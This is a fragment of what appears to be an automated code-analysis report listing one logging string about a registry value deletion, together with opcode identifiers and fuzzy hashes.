                                                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                                                                                                  • API String ID: 1001908780-1337547089
                                                                                                                                                  • Opcode ID: 47daa21c1b49792b1cfee7d0869f08c74388d9fa4a7c18e04e85d52a11cece09
                                                                                                                                                  • Instruction ID: aafddba9e6ecb0a0fae65e4841e0770dc74397f4ae34663f6ee21230fa7ea3eb
                                                                                                                                                  • Opcode Fuzzy Hash: 47daa21c1b49792b1cfee7d0869f08c74388d9fa4a7c18e04e85d52a11cece09
                                                                                                                                                  • Instruction Fuzzy Hash: 7BE04861B1C60A45E520AB0CFD516B96234FF74785F540136FF4EC6661AD2CD5E5D300